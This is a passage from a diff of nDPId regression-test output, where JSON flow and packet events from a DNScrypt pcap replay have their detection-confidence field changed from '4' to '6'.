AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":48448,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":48448,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":254,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312286} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":254,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAABQaDMAub0RcywKAAABQlUecwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":40099,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":946739312286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAAIcaDRAAL0RMhgKAAABQlUec5yjAbsCCCOeLCoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":40099,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":40099,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":47432,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":946739312286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAAXcaDUgAL0RTlcKAAABQlUec7lIAbsGBPvFLCsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":47432,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":47432,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":257,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312286} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":257,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAABQaDUAub0RcyoKAAABQlUecwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":54112,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":946739312286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAAIcaDZAAL0RMhYKAAABQlUec9NgAbsCCCOeLCgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":54112,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":54112,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":35634,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":946739312286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAAXcaDcgAL0RTlUKAAABQlUec4syAbsGBCngLCcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":35634,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":35634,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":260,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312286} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":260,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAABQaDcAub0RcygKAAABQlUecwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":946739312399,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739312399,"pkt":"ZmZmZmZmRERERERECABFAADUFOhAADYRDa1CVR5zCgAAAQG702AAwE8ILCiBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADd8l9MieIsifjQGavIzw6tdHygby+pfz9uNV\/2so9cMC7hGKDfc+LzmB07CCRnhhWiHEKH9gFPecA8dSkDUDQHbk9p0e06j3wfoDIfK8NHA0t38M\/xpcLwZlzH2416A0JuT2nR7TqPfAAAAAFfU1T+X1Smfg=="} @@ -524,26 +524,26 @@ 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":946739312401,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739312401,"pkt":"ZmZmZmZmRERERERECABFAADUFOpAADYRDatCVR5zCgAAAQG7vUAAwGUnLCmBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADd8l9MieIsifjQGavIzw6tdHygby+pfz9uNV\/2so9cMC7hGKDfc+LzmB07CCRnhhWiHEKH9gFPecA8dSkDUDQHbk9p0e06j3wfoDIfK8NHA0t38M\/xpcLwZlzH2416A0JuT2nR7TqPfAAAAAFfU1T+X1Smfg=="} 